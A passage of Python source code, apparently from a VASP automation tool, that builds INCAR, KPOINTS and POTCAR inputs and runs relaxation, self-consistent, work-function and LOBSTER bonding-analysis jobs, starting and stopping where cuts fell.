"scf": {"ALGO": "ALL", "ICHARG": 2},
"dos": {"ICHARG": 1},
"band": {"ICHARG": 1},
}
},
"r2scan": {
"base": {
"add": {"METAGGA": "R2SCAN", "LASPH": True,
"LUSE_VDW": True, "BPARAM": 11.95, "CPARAM": 0.0093},
"remove": ["GGA"]
},
"steps": {
"scf": {"ALGO": "ALL", "ICHARG": 2},
"dos": {"ICHARG": 1},
"band": {"ICHARG": 1, "LREAL": False, },
}
},
"mbj": {
"base": {
"add": {"ALGO": "Exact", "LOPTICS": True,
"CSHIFT": 0.1, "NEDOS": 2000, "ISTART": 1},
"remove": ["GGA"]
},
"steps": {
"dos": {"ICHARG": 2},
"band": {"ICHARG": 1},
}
},
"gw": {
"base": {
"add": {"ALGO": "EVGW0", "LSPECTRAL": True, "NELMGW": 1,
"ISTART": 1, "LOPTICS": True, "LREAL": False
},
"remove": ["NPAR", "NCORE"]
},
"steps": {
}
},
"bse": {
"base": {
"add": {"ALGO": "BSE", "LSPECTRAL": True, "NELMGW": 1,
"ISTART": 1, "LOPTICS": True, "LREAL": False,
"NBANDSO": 4, "NBANDSV": 20, "OMEGAMAX": 60
},
"remove": ["NPAR", "NCORE"]
},
"steps": {
}
},
}
def hash_file(obj, file_path):
with open(file_path, "r", encoding="utf8") as f:
data = f.read()
hash1 = hash(data)
hash2 = hash(str(obj))
return hash1 == hash2
def get_pot_symbols(species, mode: Literal["pbe54", "gw"] = "pbe54"):
"""
    Return the list of pseudopotential (POTCAR) symbols for the given species.
    :param species: sequence of species/elements in the structure
    :param mode: pseudopotential set, "pbe54" or "gw"
    :return: list of POTCAR symbols, with consecutive duplicates merged
"""
symbols = []
for i in species:
if mode == "pbe54":
v = potcar_config[i.name]
elif mode == "gw":
v = potcar_gw_config[i.name]
else:
break
if symbols:
if symbols[-1] == v:
continue
symbols.append(v)
return symbols
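# Editorial example (not part of the original source): the symbols come from the POTCAR
# section of config.yaml, and consecutive duplicates are merged so each POSCAR species block
# maps to one POTCAR entry. A hypothetical mapping {"Ga": "Ga_d", "As": "As"} would give
#     get_pot_symbols(Structure.from_file("GaAs.vasp").species)  # ["Ga_d", "As"]
# where "GaAs.vasp" is a placeholder structure file.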
def cp_file(source_file: Path, destination_dir: Path) -> None:
"""
    Copy the file(s) matching the source pattern into the destination directory.
    :param source_file: file (or glob pattern) to copy
    :param destination_dir: directory to copy into
    :return:
"""
src_files = glob.glob(source_file.as_posix())
for i in src_files:
logging.debug(f"\t复制文件:{i} -> {destination_dir.as_posix()}")
shutil.copy(i, destination_dir.as_posix())
return
def get_command_path(command_name):
return get_command_result(['which', command_name])
def get_command_result(cmd):
try:
        # Run the command (e.g. `which`) via subprocess and capture its output
        result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        # Check whether the command executed successfully
        if result.returncode == 0:
            # Return the command's output (the resolved path for `which`)
            return result.stdout.strip()
        else:
            # If the command was not found, return None
return None
except Exception as e:
logging.error(f"An error occurred: {e}")
return None
def check_in_out_file(path):
in_out_file = ["INCAR", "POSCAR", "KPOINTS", "POTCAR", "OUTCAR"]
return all([os.path.exists(os.path.join(path, i)) for i in in_out_file])
def array_to_dat(file_path, x_array, *data_array, headers: list = []):
x_array = x_array.reshape(1, -1)
all_data_array = np.array(data_array)
result = None
with open(file_path, "w", encoding="utf8") as f:
f.write("# " + "".join(map(lambda x: f"{x:<15}", headers)) + '\n')
f.write(f"# GroupSize & Groups: {all_data_array.shape[2]} {all_data_array.shape[1]}" '\n')
for i in range(all_data_array.shape[1]):
if i % 2 == 0:
single = np.vstack([x_array, all_data_array[:, i, :]])
else:
single = np.vstack([np.flip(x_array), np.flip(all_data_array[:, i, :], axis=1)])
f.write('\n')
for row in single.T:
f.write("".join(map(lambda x: f"{x:<15.8f} " if not isinstance(x, dict) else f"{x} ", row)) + '\n')
# np.savetxt(f,single.T, delimiter=" ", fmt='%f',comments="",header=header)
# Export the structures parsed from a vasprun.xml into an extended-xyz (extxyz) file.
def write_to_xyz(vaspxml_path, save_path, Config_type, append=True):
    if setting.get("ExportXYZ"):
        if ase_read is None:
            logging.error("ExportXYZ is enabled in the settings, but ase is not installed; please run: pip install ase")
else:
atoms_list = []
atoms = ase_read(vaspxml_path, index=":")
index = 1
for atom in atoms:
xx, yy, zz, yz, xz, xy = -atom.calc.results['stress'] * atom.get_volume() # *160.21766
atom.info['virial'] = np.array([(xx, xy, xz), (xy, yy, yz), (xz, yz, zz)])
atom.calc.results['energy'] = atom.calc.results['free_energy']
atom.info['Config_type'] = Config_type + str(index)
atom.info['Weight'] = 1.0
del atom.calc.results['stress']
del atom.calc.results['free_energy']
atoms_list.append(atom)
index += 1
ase_write(save_path, atoms_list, format='extxyz', append=append)
def store_dataframe_as_json(dataframe, filename, orient="split"):
with zopen(filename, "w") as f:
data = json.dumps(dataframe.to_dict(orient=orient), cls=MontyEncoder)
f.write(data)
def load_dataframe_from_json(filename, pbar=True, decode=True):
# Progress bar for reading file with hook
pbar1 = tqdm(desc=f"Reading file {filename}", position=0, leave=True, ascii=True, disable=not pbar)
# Progress bar for decoding objects
pbar2 = tqdm(desc=f"Decoding objects from {filename}", position=0, leave=True, ascii=True, disable=not pbar)
with zopen(filename, "rb") as f:
dataframe_data = json.load(f, cls=MontyDecoder)
pbar1.close()
pbar2.close()
if isinstance(dataframe_data, dict):
if set(dataframe_data.keys()) == {"data", "columns", "index"}:
return pd.DataFrame(**dataframe_data)
else:
return pd.DataFrame(dataframe_data)
def read_dataframe_from_file(file_path: Path, duplicated=True, **kwargs) -> pd.DataFrame:
"""
    Read structures from the given path, which may be a directory or a single structure file.
Returns: (pd.DataFrame)
"""
if file_path.is_dir():
systems = []
for p in file_path.iterdir():
try:
s = read_dataframe_from_file(p, False)
systems.append(s)
except:
logging.warning(f"读取结构文件{p}失败。")
pass
df = pd.concat(systems)
else:
if file_path.suffix.endswith(".json"):
df = load_dataframe_from_json(file_path, **kwargs)
elif file_path.name.endswith("POSCAR") or file_path.suffix in [".cif", ".vasp"]:
struct = Structure.from_file(file_path)
struct.remove_oxidation_states()
if setting.get("UseInputFileName", False):
system = file_path.stem
else:
system = struct.composition.to_pretty_string()
df = pd.DataFrame([{"system": system,
"structure": struct}])
elif file_path.name.endswith("xyz"):
systems = []
if ase_read is None:
logging.error("xyz文件必须安装ase,请 pip install ase 安装!")
return pd.DataFrame()
atoms = ase_read(file_path, index=":", format="extxyz", do_not_split_by_at_sign=True)
for atom in atoms:
struct = AseAtomsAdaptor.get_structure(atom)
                # xyz frames can share the same formula, so an index is appended later to tell them apart
systems.append({"system": struct.composition.to_pretty_string(),
"structure": struct})
df = pd.DataFrame(systems)
else:
raise ValueError(f"仅支持后缀为POSCAR、cif、vasp、json、xyz类型的文件")
if duplicated:
df.reset_index(drop=True, inplace=True)
duplicated = df[df.duplicated("system", False)]
group = duplicated.groupby("system")
df["group_number"] = group.cumcount()
df["group_number"] = df["group_number"].fillna(-1)
df["group_number"] = df["group_number"].astype(int)
df['system'] = df.apply(
lambda row: f"{row['system']}-{row['group_number'] + 1}" if row['group_number'] >= 0 else row['system'],
axis=1)
df.drop("group_number", inplace=True, axis=1)
df.reset_index(drop=True, inplace=True)
return df
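# Editorial usage sketch (not part of the original source): reading a single POSCAR, a whole
# directory of structures, or an extxyz trajectory all yield the same two-column DataFrame
# ("system", "structure"); the file names below are placeholders.
#     df = read_dataframe_from_file(Path("POSCAR"))
#     df = read_dataframe_from_file(Path("./structures"))   # every readable file inside
#     df = read_dataframe_from_file(Path("train.xyz"))      # requires ase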
def verify_path(path: Path) -> None:
"""
    Check whether the path exists; if not, create it (multi-level directories are supported).
:param path:
:return:
"""
if not path.exists():
# path.mkdir()
os.makedirs(path)
def get_vacuum_axis(structure: Structure, vacuum_size=10):
"""
    Determine which lattice axis contains the vacuum layer: an axis whose empty gap is larger
    than vacuum_size (in Å) is treated as the vacuum axis. Returns None if there is none.
:param structure:
:return:
"""
coords = np.array([site.coords for site in structure.sites])
maxcoords = np.max(coords, axis=0)
mincoords = np.min(coords, axis=0)
if (structure.lattice.a - maxcoords[0]) + (mincoords[0]) > vacuum_size:
return 0
elif (structure.lattice.b - maxcoords[1]) + (mincoords[1]) > vacuum_size:
return 1
elif (structure.lattice.c - maxcoords[2]) + (mincoords[2]) > vacuum_size:
return 2
else:
return None
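# Editorial example (not part of the original source): for a slab with c = 30 Å whose atoms
# only span 0-15 Å along c, the empty gap (30 - 15) + 0 = 15 Å exceeds vacuum_size, so
#     get_vacuum_axis(slab_structure)  # -> 2 (the c axis); a bulk cell returns None
# `slab_structure` is a placeholder Structure object.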
class BaseIncar(Incar):
PBE_EDIFF = 1e-06
PBE_EDIFFG = -0.01
HSE_EDIFF = 1e-04
HSE_EDIFFG = -0.01
ENCUT = 500
def __init__(self, params: dict = None, **kwargs):
super().__init__(params)
self.update(kwargs)
@classmethod
def build(cls, system: str, function: FUNCTION_TYPE = "pbe", **kwargs):
base = config.get("INCAR").copy()
base: dict
        # Base parameters for the different functionals.
        # For hybrid functionals, ICHARG=1 and ICHARG=2 differ by roughly a factor of two in
        # runtime and give slightly different energies. Benchmark: Si2 HSE DOS
        # ICHARG=1: CBM 6.3352  VBM 5.3661  dos_gap 0.9691  wall time ~30 min
        # ICHARG=2: CBM 6.3218  VBM 5.3525  dos_gap 0.9693  wall time ~12 min
# ---------------------------------------------------------------------
step_incar = step_base_incar[system]
base.update(step_incar["add"])
for i in step_incar["remove"]:
if i in base:
base.pop(i)
if function != "pbe":
function_incar = function_base_incar[function]
base.update(function_incar["base"]["add"])
for i in function_incar["base"]["remove"]:
if i in base:
base.pop(i)
step_function_incar = function_incar["steps"].get(system)
if step_function_incar:
base.update(step_function_incar)
base.update(kwargs)
return cls(base)
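    # Editorial usage sketch (not part of the original source): `build` layers the INCAR in
    # three passes -- the global INCAR block of config.yaml, the step overrides
    # (step_base_incar), then the functional overrides (function_base_incar) -- e.g.
    #     incar = BaseIncar.build("scf", function="hse")   # hybrid-functional SCF settings
    #     incar = BaseIncar.build("band", NBANDS=64)       # extra uppercase kwargs go straight in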
def has_magnetic(self, structure):
"""
        Decide from the configured MAGMOM table whether the system is magnetic; if so, enable
        spin polarization (ISPIN=2) and set the MAGMOM tag.
        :return: None (the INCAR is updated in place)
"""
magmom = []
spin = []
_ = [0, 0]
for site in structure.sites:
if site.species_string in config.get("MAGMOM").keys():
mag = config.get("MAGMOM")[site.species_string]
spin.append(True)
elif site.specie.name in config.get("MAGMOM").keys():
mag = config.get("MAGMOM")[site.specie.name]
spin.append(True)
else:
mag = 0
spin.append(False)
if _[1] == mag:
_[0] += 1
else:
magmom.append(f"{_[0]}*{_[1]}")
_ = [1, mag]
magmom.append(f"{_[0]}*{_[1]}")
if any(spin):
self["ISPIN"] = 2
self["MAGMOM"] = " ".join(magmom)
def auto_encut(self, structure: Structure, pseudopotential="pbe54"):
max_encut = 0
for symbol in get_pot_symbols(structure.species, pseudopotential):
single = PotcarSingle.from_symbol_and_functional(symbol, functional="PBE_54")
if max_encut < single.enmax:
max_encut = single.enmax
encut = int(setting.get("ENCUTScale") * max_encut)
self["ENCUT"] = encut
logging.info(f"\t截断能根据{setting.get('ENCUTScale')}倍取值:{encut}")
class BaseKpoints:
_instance = None
init_flag = False
def __new__(cls, *args):
if cls._instance is None:
cls._instance = object.__new__(cls)
return cls._instance
def __init__(self, kpoints_type="Gamma"):
if BaseKpoints.init_flag:
return
BaseKpoints.init_flag = True
self.kpoints_type = kpoints_type
self.kpoints = config.get("KPOINTS")
def get_kpoint_setting(self, job_type: str, step_type: str, function: str):
if job_type not in self.kpoints.keys():
return 30
if step_type not in self.kpoints[job_type].keys():
return 30
if function not in self.kpoints[job_type][step_type].keys():
function = "default"
return self.kpoints[job_type][step_type][function]
@classmethod
def automatic_density(cls, structure: Structure, kppa: float) -> Tuple3Ints:
if math.fabs((math.floor(kppa ** (1 / 3) + 0.5)) ** 3 - kppa) < 1:
kppa += kppa * 0.01
lattice = structure.lattice
lengths: Vector3D = lattice.abc
ngrid = kppa / len(structure)
mult: float = (ngrid * lengths[0] * lengths[1] * lengths[2]) ** (1 / 3)
num_div: Tuple3Ints = cast(Tuple3Ints, [math.floor(max(mult / length, 1)) for length in lengths])
return num_div
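    # Editorial note (not part of the original source): with ngrid = kppa / natoms and
    # mult = (ngrid * a * b * c) ** (1/3), the divisions n_i = floor(mult / length_i) satisfy
    #     n1 * n2 * n3 * natoms ≈ kppa
    # so `kppa` is the requested number of k-points per reciprocal atom (values >= 100 in
    # config.yaml are interpreted this way by get_kpoints below).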
@classmethod
def automatic_density_by_lengths(
cls, structure: Structure, length_densities: Sequence[float]
) -> Tuple3Ints:
if len(length_densities) != 3:
raise ValueError(f"The dimensions of length_densities must be 3, not {len(length_densities)}")
lattice = structure.lattice
abc = lattice.abc
num_div: Tuple3Ints = tuple(math.ceil(ld / abc[idx]) for idx, ld in enumerate(length_densities))
return num_div
def get_kpoints(self, job_type: str, step_type: str, function: str, structure: Structure):
kp = self.get_kpoint_setting(job_type, step_type, function)
if isinstance(kp, (int, float)):
if kp >= 100:
kp = self.automatic_density(structure, kp)
else:
kps = [kp, kp, kp]
vacuum = get_vacuum_axis(structure, 10)
if vacuum is not None:
kps[vacuum] = 1
kp = self.automatic_density_by_lengths(structure, kps)
logging.info(f"\t网格K点:{kp}")
if self.kpoints_type.upper().startswith("M"):
return Kpoints.monkhorst_automatic(kp)
return Kpoints.gamma_automatic(kp)
def get_line_kpoints(self, path: Path, function: str, structure: Structure, job_type="band_structure",
step_type="band") -> Kpoints:
if function == "pbe":
if os.path.exists("./HIGHPATH"):
kpoints = Kpoints.from_file("./HIGHPATH")
logging.info("使用自定义的高对称路径文件!")
# 下面这个循环 是将伽马点转换希腊字符,画图时的用
for i, k in enumerate(kpoints.labels):
if "gamma" in k.lower():
kpoints.labels[i] = "$\\Gamma$"
else:
kpath = HighSymmKpath(structure, path_type="hinuma")
kpoints = Kpoints.automatic_linemode(self.get_kpoint_setting(job_type, step_type, function), kpath)
                # The loop below converts the Gamma label to the Greek character used for plotting.
for i, k in enumerate(kpoints.labels):
if "gamma" in k.lower():
kpoints.labels[i] = "$\\Gamma$"
return kpoints
if path.joinpath("pbe/band/vasprun.xml").exists():
pbe_vasprun = BSVasprun(path.joinpath("pbe/band/vasprun.xml").as_posix())
pbe_kpoints = Kpoints.from_file(path.joinpath("pbe/band/KPOINTS").as_posix())
kpoints1 = Kpoints.from_file(path.joinpath("pbe/scf/IBZKPT").as_posix())
kpoints = Kpoints("Generated by VaspTool ", kpoints1.num_kpts + len(pbe_vasprun.actual_kpoints),
style=Kpoints.supported_modes.Reciprocal,
kpts=kpoints1.kpts + pbe_vasprun.actual_kpoints,
kpts_weights=kpoints1.kpts_weights + [0 for i in range(len(pbe_vasprun.actual_kpoints))])
            labels = []
            for k in kpoints.kpts:
                if k in pbe_kpoints.kpts:
                    labels.append(pbe_kpoints.labels[pbe_kpoints.kpts.index(k)])
                else:
                    labels.append(None)
            kpoints.labels = labels
return kpoints
else:
kpts: list[float | None] = []
weights: list[float | None] = []
all_labels: list[str | None] = []
kp = self.get_kpoint_setting(job_type, "scf", function)
if isinstance(kp, int):
grid = Kpoints.automatic_density(structure, kp).kpts[0]
else:
grid = kp
ir_kpts = SpacegroupAnalyzer(structure, symprec=0.1).get_ir_reciprocal_mesh(grid)
for k in ir_kpts:
kpts.append(k[0])
weights.append(int(k[1]))
all_labels.append(None)
# for line mode only, add the symmetry lines w/zero weight
kpath = HighSymmKpath(structure, path_type="hinuma")
frac_k_points, labels = kpath.get_kpoints(
line_density=self.get_kpoint_setting(job_type, step_type, function), coords_are_cartesian=False
)
for k, f in enumerate(frac_k_points):
kpts.append(f)
weights.append(0.0)
all_labels.append(labels[k])
comment = "run along symmetry lines"
return Kpoints(
comment=comment,
style=Kpoints.supported_modes.Reciprocal,
num_kpts=len(kpts),
kpts=kpts, # type: ignore
kpts_weights=weights,
labels=all_labels,
)
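# Illustrative usage (editor's sketch, names taken from this file): BaseKpoints is a singleton, so
#   kpts = BaseKpoints("Gamma").get_kpoints("band_structure", "scf", "pbe", structure)
# returns a Gamma-centred Kpoints object whose density is read from the KPOINTS section of the config.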
class JobBase():
result_label = []
def __init__(self, structure: Structure, path, job_type, step_type, function, kpoints_type="Gamma", folder=None,
KPOINTS=None,
open_soc=False, dft_u=False, force_coverage=False, mpirun_path="mpirun", vasp_path="vasp_std", cores=1,
**kwargs):
self.test = None
self.structure = structure
self.path: Path = path
self.job_type = job_type
self.step_type = step_type
if folder is None:
self.folder = self.step_type
else:
self.folder = folder
self.function = function
self.open_soc = open_soc
self.dft_u = dft_u
self.kpoints_type = kpoints_type
if KPOINTS is not None:
assert isinstance(KPOINTS, Kpoints), f"自定义KPOINTS必须传入一个Kpoints对象而不是{type(KPOINTS)}"
self.KPOINTS = KPOINTS
self.force_coverage = force_coverage
self.mpirun_path = mpirun_path
self.vasp_path = vasp_path
self.cores = cores
self.cb_energy = 4
self.dpi = 300
self.vb_energy = -4
self.incar_kwargs = {}
for k, v in kwargs.items():
if k.isupper():
                # For now, route all-uppercase keyword arguments to the INCAR; revisit if this causes bugs
self.incar_kwargs[k] = v
else:
setattr(self, k, v)
        # job_type: the kind of calculation, e.g. band structure
        # step_type: the sub-step of that calculation, e.g. relaxation, SCF, property
verify_path(self.run_dir)
logging.info("当前计算路径:" + self.run_dir.as_posix())
if self.function in ["gw"]:
self.pseudopotential = "gw"
else:
self.pseudopotential = "pbe54"
@cached_property
def run_dir(self) -> Path:
"""
获取vasp 计算路径
:return:
"""
if self.test is not None:
return self.path.joinpath(f"{self.function}/{self.folder}/{self.test}")
return self.path.joinpath(f"{self.function}/{self.folder}")
@cached_property
def incar(self) -> BaseIncar:
"""Incar object."""
incar = BaseIncar.build(self.step_type, self.function)
formula = self.structure.composition.to_pretty_string()
incar["SYSTEM"] = formula + "-" + self.function + "-" + self.step_type
incar.has_magnetic(self.structure)
if "ENCUT" not in self.incar_kwargs:
if setting.get("ENCUTScale"):
incar.auto_encut(self.structure)
if self.step_type != "sr":
if "NSW" in self.incar_kwargs:
self.incar_kwargs.pop("NSW")
incar.update(self.incar_kwargs)
if self.open_soc:
incar["LSORBIT"] = True
if self.dft_u and incar.get("LDAU") is None:
data_u = config.get("U", {})
if not data_u:
logging.warning("\t开启DFT+U必须在配置文件设置U,开启失败!")
return incar
LDAUL = []
LDAUU = []
LDAUJ = []
LDAUL_max = 1
for elem in self.structure.composition.elements:
if elem.name in data_u.keys():
LDAUL.append(str(data_u[elem.name]["LDAUL"]))
LDAUU.append(str(data_u[elem.name]["LDAUU"]))
LDAUJ.append(str(data_u[elem.name]["LDAUJ"]))
if LDAUL_max < data_u[elem.name]["LDAUL"]:
LDAUL_max = data_u[elem.name]["LDAUL"]
else:
LDAUL.append("-1")
LDAUU.append("0")
LDAUJ.append("0")
if all([i == "-1" for i in LDAUL]):
logging.warning("\t在配置文件中没有找到该体系的U值,开启失败!")
return incar
incar["LDAU"] = True
incar["LDAUTYPE"] = 2
incar["LMAXMIX"] = LDAUL_max * 2
incar["LDAUL"] = " ".join(LDAUL)
incar["LDAUU"] = " ".join(LDAUU)
incar["LDAUJ"] = " ".join(LDAUJ)
return incar
@cached_property
def kpoints(self) -> Kpoints:
"""Kpoints object."""
if self.KPOINTS is None:
return BaseKpoints(self.kpoints_type).get_kpoints(self.job_type, self.step_type, self.function,
self.structure)
else:
return self.KPOINTS
@cached_property
def poscar(self) -> Poscar:
"""Poscar object."""
poscar = Poscar(self.structure)
return poscar
@cached_property
def potcar(self) -> Potcar:
potcar = Potcar(symbols=get_pot_symbols(self.structure.species, self.pseudopotential), functional="PBE_54")
return potcar
def check_cover(self):
"""
检查输入文件 避免重复计算 如果不需要重复计算 返回True 否则返回False
:param run_dir:
:return:
"""
if not self.force_coverage and check_in_out_file(self.run_dir):
hash_table = [
hash_file(self.incar, self.run_dir.joinpath("INCAR")),
hash_file(self.kpoints, self.run_dir.joinpath("KPOINTS")),
hash_file(self.poscar, self.run_dir.joinpath("POSCAR")),
hash_file(self.potcar, self.run_dir.joinpath("POTCAR")),
]
if all(hash_table):
try:
if Outcar(os.path.join(self.run_dir, "OUTCAR")).run_stats.get("User time (sec)"):
logging.info("\t已有缓存,如果覆盖运行,设置--force_coverage 或者 -f ")
return True
except:
pass
src_files = ["WAVE*", "CHG*", "*.tmp"]
for src in src_files:
src_file_list = self.run_dir.glob(src)
for file in src_file_list:
Path(file).unlink()
return False
def run(self, timeout=None, lobster=None, remove_wavecar=False):
if self.open_soc:
            # SOC is enabled, so switch to the vasp_ncl binary
vasp_path = self.vasp_path.with_name("vasp_ncl")
else:
vasp_path = self.vasp_path
vasp_input = VaspInput(self.incar, self.kpoints, self.poscar, self.potcar)
vasp_cmd = [self.mpirun_path, "-np", str(self.cores), vasp_path]
start = datetime.datetime.now()
logging.info("\t开始计算")
vasp_input.write_input(output_dir=self.run_dir)
if lobster:
lobster.write_INCAR(incar_input=self.run_dir.joinpath("INCAR"), incar_output=self.run_dir.joinpath("INCAR"),
poscar_input=self.run_dir.joinpath("POSCAR"))
vasp_cmd = vasp_cmd or SETTINGS.get("PMG_VASP_EXE") # type: ignore[assignment]
if not vasp_cmd:
raise ValueError("No VASP executable specified!")
vasp_cmd = [os.path.expanduser(os.path.expandvars(t)) for t in vasp_cmd]
if not vasp_cmd:
raise RuntimeError("You need to supply vasp_cmd or set the PMG_VASP_EXE in .pmgrc.yaml to run VASP.")
with cd(self.run_dir), open("vasp.out", "w") as f_std, open("vasp.err", "w", buffering=1) as f_err:
subprocess.check_call(vasp_cmd, stdout=f_std, stderr=f_err, timeout=timeout)
logging.info("\t计算完成" + f"\t耗时:{datetime.datetime.now() - start}")
if remove_wavecar:
self.run_dir.joinpath("WAVECAR").unlink()
return self
@abc.abstractmethod
def post_processing(self, result=None):
pass
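# Illustrative lifecycle sketch (editor's addition; the argument dict is hypothetical): concrete jobs are
# typically driven as
#   job = StructureRelaxationJob(structure=structure, path=Path("./cache/NaCl"), job_type="band_structure",
#                                function="pbe", **job_args).run()
#   result = job.post_processing({})
# where job_args bundles the shared options (cores, vasp_path, mpirun_path, kpoints_type, ...).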
class StructureRelaxationJob(JobBase):
"""
结构优化的类
"""
def __init__(self, **kwargs):
super().__init__(step_type="sr", **kwargs)
        # VASP sometimes asks to copy CONTCAR and continue the relaxation; this caps the number of retries
self.run_count = 3
def run(self, **kwargs):
self.final_structure = self.structure
if self.check_cover():
self.post_processing()
return self
try:
super().run(**kwargs)
self.post_processing()
except:
if self.run_count <= 0:
self.post_processing()
return self
error = re.compile(".*please rerun with smaller EDIFF, or copy CONTCAR.*")
with open(self.run_dir.joinpath(f"vasp.out"), "r", encoding="utf8") as f:
for line in f:
if error.match(line):
logging.info("复制CONTCAR继续优化。。。")
self.run_count -= 1
self.structure = Structure.from_file(self.run_dir.joinpath(f"CONTCAR"))
return self.run(**kwargs)
return self
def plot_energy_force(self):
out = Outcar(self.run_dir.joinpath("OUTCAR"))
out.read_pattern({
"e_fr_energy": r"free energy TOTEN\s+=\s+([\d\-\.]+)",
}, postprocess=float)
energy = np.array(out.data["e_fr_energy"])
energy = energy.flatten()
a = out.read_table_pattern(r"TOTAL-FORCE \(eV/Angst\)\n\s*\-+\n", r"\s+".join([r"(\-*[\.\d]+)"] * 6), r"-*\n",
last_one_only=False, postprocess=float)
force = np.array(a)[:, :, 3:]
force = force.reshape((force.shape[0], -1))
max_froce = np.max(force, 1)
result = np.vstack([np.arange(energy.shape[0]), energy, max_froce]).T
fig, axes = plt.subplots(2, 1, sharex=True)
axes1, axes2 = axes
axes1.plot(result[:, 0], result[:, 1], label="energy", color="red")
axes1.set_ylabel("energy(eV)")
axes1.legend()
axes2.plot(result[:, 0], result[:, 2], label="max force", color="green")
axes2.set_ylabel("max force")
axes2.legend()
axes2.set_xlabel("steps")
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("energy_forces.png"), dpi=150)
def post_processing(self, result=None):
if result is None:
result = {}
self.final_structure = Structure.from_file(self.run_dir.joinpath("CONTCAR"))
self.final_structure.to(self.run_dir.parent.joinpath(
f'{self.final_structure.composition.to_pretty_string()}-{self.function}.cif').as_posix())
try:
self.plot_energy_force()
except:
pass
class SCFJob(JobBase):
def __init__(self, step_type="scf", **kwargs):
super().__init__(step_type=step_type, **kwargs)
"""
因为scf后面会用到很多 所以要根据job_type 区分不同场景的
"""
@cached_property
def incar(self):
incar = super().incar
if self.job_type in ["single_point_energy", "phono"]:
if "LWAVE" not in self.incar_kwargs.keys():
incar["LWAVE"] = False
if "LCHARG" not in self.incar_kwargs.keys():
incar["LCHARG"] = False
incar["NSW"] = 0
return incar
@cached_property
def kpoints(self):
"""
因为有的体系自洽是用的连续点模式
重写一下
:return:
"""
if self.function in ["r2scan", "scan", "mbj"]:
return BaseKpoints(self.kpoints_type).get_line_kpoints(self.path, self.function, self.structure)
return super().kpoints
def run(self, **kwargs):
if self.check_cover():
return self
if self.function in ["hse", "gw", "r2scan", "scan", "mbj", "diag"]:
if self.path.joinpath(f"pbe/{self.folder}").exists():
cp_file(self.path.joinpath(f"pbe/{self.folder}/WAVECAR"), self.run_dir)
super().run(**kwargs)
        # Some systems do not converge
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False,
parse_eigen=False)
if vasprun.converged:
return self
logging.warning("自洽不收敛,后面计算可能会受到影响!")
return self
# raw_kpoint=self.kpoints
# for i in range(30):
# super().run(**kwargs)
# # 有的体系不收敛 读取电荷密度接着自洽
# vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False,
# parse_eigen=False)
# if vasprun.converged:
# if raw_kpoint.kpts!=self.kpoints.kpts:
# logging.warning("Gamma点收敛,恢复原k点继续自洽!")
#
# self.kpoints=raw_kpoint
# continue
# return self
# if raw_kpoint.style==KpointsSupportedModes.Monkhorst:
# new=Kpoints.monkhorst_automatic([1,1,1])
# else:
# new = Kpoints.gamma_automatic([1,1,1])
# self.kpoints=new
# self.incar["ICHARG"] = 1
# logging.warning("自洽不收敛,读取电荷密度继续自洽!")
#
# logging.warning("10次自洽不收敛,后面计算可能会受到影响!")
# return self
def post_processing(self, result=None):
if result is None:
result = {}
"""
自洽的返回费米能级
:return:
"""
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=True)
result[f"efermi_{self.function}"] = vasprun.efermi
result[f"energy_{self.function}"] = vasprun.final_energy
result[f"volume_{self.function}"] = vasprun.final_structure.volume
if self.job_type == "single_point_energy":
name = vasprun.final_structure.composition.to_pretty_string()
config_type = self.structure.properties.get("Config_type", f"scf-{name}")
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), f"./result/{name}{GlobSuffix}.xyz", config_type,
append=True)
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), f"./result/train{GlobSuffix}.xyz", config_type,
append=True)
return result
class WorkFunctionJob(SCFJob):
def __init__(self, **kwargs):
super().__init__(job_type="work_function", folder="work_function", step_type="scf", **kwargs)
@cached_property
def incar(self):
incar = super().incar
incar["LVHAR"] = True
if get_vacuum_axis(self.structure, 10) is not None:
incar["LDIPOL"] = True
incar["IDIPOL"] = get_vacuum_axis(self.structure, 5) + 1
return incar
def post_processing(self, result=None):
result = super().post_processing(result)
loc = Locpot.from_file(self.run_dir.joinpath("LOCPOT"))
fig = plt.figure()
z_data = loc.get_average_along_axis(2)
z_index = loc.get_axis_grid(2)
plt.plot(z_index, z_data)
plt.xlabel("Position (A)")
plt.ylabel("Potential (eV)")
plt.savefig(self.run_dir.joinpath(f"work_function_{self.function}.png"), dpi=self.dpi)
np.savetxt(self.run_dir.joinpath(f"work_function_{self.function}.csv"), np.vstack([z_index, z_data]).T)
vacuum_level = np.max(z_data)
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=True)
result[f"vacuum_level_{self.function}"] = vacuum_level
result[f"work_function_{self.function}"] = vacuum_level - vasprun.efermi
return result
class LobsterJob(JobBase):
def __init__(self, **kwargs):
super().__init__(step_type="scf", folder="cohp", **kwargs)
def build_lobster(self, basis_setting):
lobsterin_dict = {"basisSet": "pbeVaspFit2015", "COHPstartEnergy": -10.0, "COHPendEnergy": 10.0,
"cohpGenerator": "from 0.1 to 6.0 orbitalwise", "saveProjectionToFile": True}
# every interaction with a distance of 6.0 is checked
# the projection is saved
if self.incar["ISMEAR"] == 0:
lobsterin_dict["gaussianSmearingWidth"] = self.incar["SIGMA"]
lobsterin_dict["skipdos"] = True
lobsterin_dict["skipcoop"] = True
lobsterin_dict["skipPopulationAnalysis"] = True
lobsterin_dict["skipGrossPopulation"] = True
# lobster-4.1.0
lobsterin_dict["skipcobi"] = True
lobsterin_dict["skipMadelungEnergy"] = True
basis = [f"{key} {value}" for key, value in basis_setting.items()]
lobsterin_dict["basisfunctions"] = basis
self.lobster = Lobsterin(lobsterin_dict)
self.lobster.write_lobsterin(self.run_dir.joinpath("lobsterin").as_posix())
return self.lobster
def run_lobster(self):
logging.info("\t开始运行lobster")
with cd(self.run_dir), open("lobster.out", "w") as f_std, open("lobster.err", "w", buffering=1) as f_err:
subprocess.check_call(["lobster"], stdout=f_std, stderr=f_err, )
logging.info("\tlobster分析结束")
def run(self, **kwargs):
if self.check_cover():
return self
return super().run(lobster=self.lobster, **kwargs)
def extract_icohp(self):
icohp = Icohplist(filename=self.run_dir.joinpath("ICOHPLIST.lobster").as_posix())
icohps = icohp.icohpcollection
elements_with_numbers = list(set(icohps._list_atom1 + icohps._list_atom2))
def extract_number(element):
